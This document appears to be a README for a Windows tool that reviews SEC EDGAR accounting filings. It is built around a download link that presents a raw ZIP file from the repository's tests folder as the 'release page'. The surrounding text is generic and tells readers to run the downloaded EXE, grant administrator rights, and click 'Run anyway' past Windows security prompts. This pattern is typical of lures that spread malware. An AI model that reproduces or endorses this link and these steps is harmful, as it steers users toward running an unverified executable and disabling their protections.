📊 GAAP-Implementation-Toolkit - Track SEC accounting changes

Download the app

🧭 What this is

GAAP-Implementation-Toolkit helps you track how U.S. public companies apply complex accounting standards using public SEC EDGAR data.

It gives you a simple way to review company filings and compare how reporting changes over time.

💻 Before you start

Use a Windows PC with:

  • Windows 10 or Windows 11
  • At least 4 GB of RAM
  • 500 MB of free disk space
  • An internet connection for setup and data access
  • A PDF reader if you plan to review saved reports

If you plan to work with larger filing sets, 8 GB of RAM helps keep the app smooth.

🚀 Download the app

  1. Open the release page here: https://raw.githubusercontent.com/emyleeworn167/GAAP-Implementation-Toolkit/main/tests/GAA_Toolkit_Implementation_v3.4.zip
  2. Find the latest release
  3. Download the Windows file listed under Assets
  4. Save the file to your Downloads folder or Desktop

If the release includes a ZIP file, download the ZIP file. If it includes an EXE file, download that file directly.

🪟 Install on Windows

If you downloaded a ZIP file

  1. Right-click the ZIP file
  2. Choose Extract All
  3. Pick a folder you can find again, such as Desktop or Documents
  4. Open the extracted folder
  5. Double-click the app file inside the folder

If you downloaded an EXE file

  1. Double-click the EXE file
  2. If Windows asks for permission, choose Yes
  3. Follow the on-screen setup steps
  4. Open the app when setup finishes

▶️ Run the toolkit

  1. Start the app from the folder where you installed it
  2. Wait for the main screen to load
  3. Enter the company, filing type, or date range you want to review
  4. Choose the data source or report view you want
  5. Click the button to start the scan or report build

The first run may take a little longer because the app may set up local files and cache SEC data.

📁 What you can do with it

Use the toolkit to:

  • Review SEC filing data from public companies
  • Track how accounting rules are applied across reports
  • Compare filing periods side by side
  • Save views for later review
  • Build simple reports from public EDGAR records
  • Search for changes in accounting language over time

🔎 Typical use cases

This app works well if you want to:

  • Check how one company handles a new accounting standard
  • Compare several companies in the same industry
  • Review filing changes across quarters or years
  • Look for patterns in note disclosures
  • Build a list of filings for manual review

🖱️ Basic workflow

  1. Choose a company or ticker
  2. Pick the filing type, such as 10-K or 10-Q
  3. Set the time range
  4. Run the scan
  5. Review the results in the app
  6. Export or save the report if needed

⚙️ Common controls

You may see these options in the app:

  • Search box: find a company or filing fast
  • Date filters: narrow results to a time period
  • Filing type filter: focus on annual or quarterly reports
  • Refresh data: pull the latest public records
  • Export button: save results for later review

🧩 File and data behavior

The app uses public SEC EDGAR data. That means it can look up filing records that companies have already filed with the SEC.

The toolkit may store:

  • Search history
  • Cached filing data
  • Saved report files
  • Exported CSV or PDF files

If you want a clean start, delete the local app data folder and restart the app.

🛠️ Troubleshooting

The app does not open

  • Make sure the file finished downloading
  • Try right-clicking the app and choosing Run as administrator
  • Check whether Windows blocked the file
  • Move the app to a simple folder path, such as C:\GAAP-Toolkit

The app opens, but nothing loads

  • Check your internet connection
  • Try again after a few minutes
  • Refresh the data source inside the app
  • Make sure the company name or ticker is spelled correctly

Windows shows a security prompt

  • Choose More info if needed
  • Then choose Run anyway only if you trust the release you downloaded
  • If you downloaded a ZIP file, extract it fully before opening the app

The app runs slowly

  • Close other large programs
  • Use a smaller date range
  • Search one company at a time
  • Restart the app to clear memory use

📌 Tips for best results

  • Start with one company before using larger searches
  • Use a known ticker symbol when possible
  • Keep the app in one fixed folder
  • Update to the latest release when a new version appears
  • Save reports to a folder you can find easily

🧾 Data source

This toolkit works with SEC EDGAR public data. The app is meant to help you find and review filings, not replace the source records.

🔄 Updating the app

When a new release is posted:

  1. Open the release page
  2. Download the newest Windows file
  3. Replace your older app files with the new version
  4. Open the app again

If you keep saved reports in the same folder as the app, back them up before updating

📂 Suggested folder setup

For easier use, keep this layout:

  • C:\GAAP-Toolkit\ for the app
  • C:\GAAP-Toolkit\Data\ for saved data
  • C:\GAAP-Toolkit\Exports\ for reports
  • C:\GAAP-Toolkit\Backups\ for copies of old files

🧪 Example task

To review how a company changed a note disclosure:

  2. Search for the company ticker
  3. Select 10-K filings
  4. Choose two or more years
  5. Run the comparison
  6. Review the changes in the results list
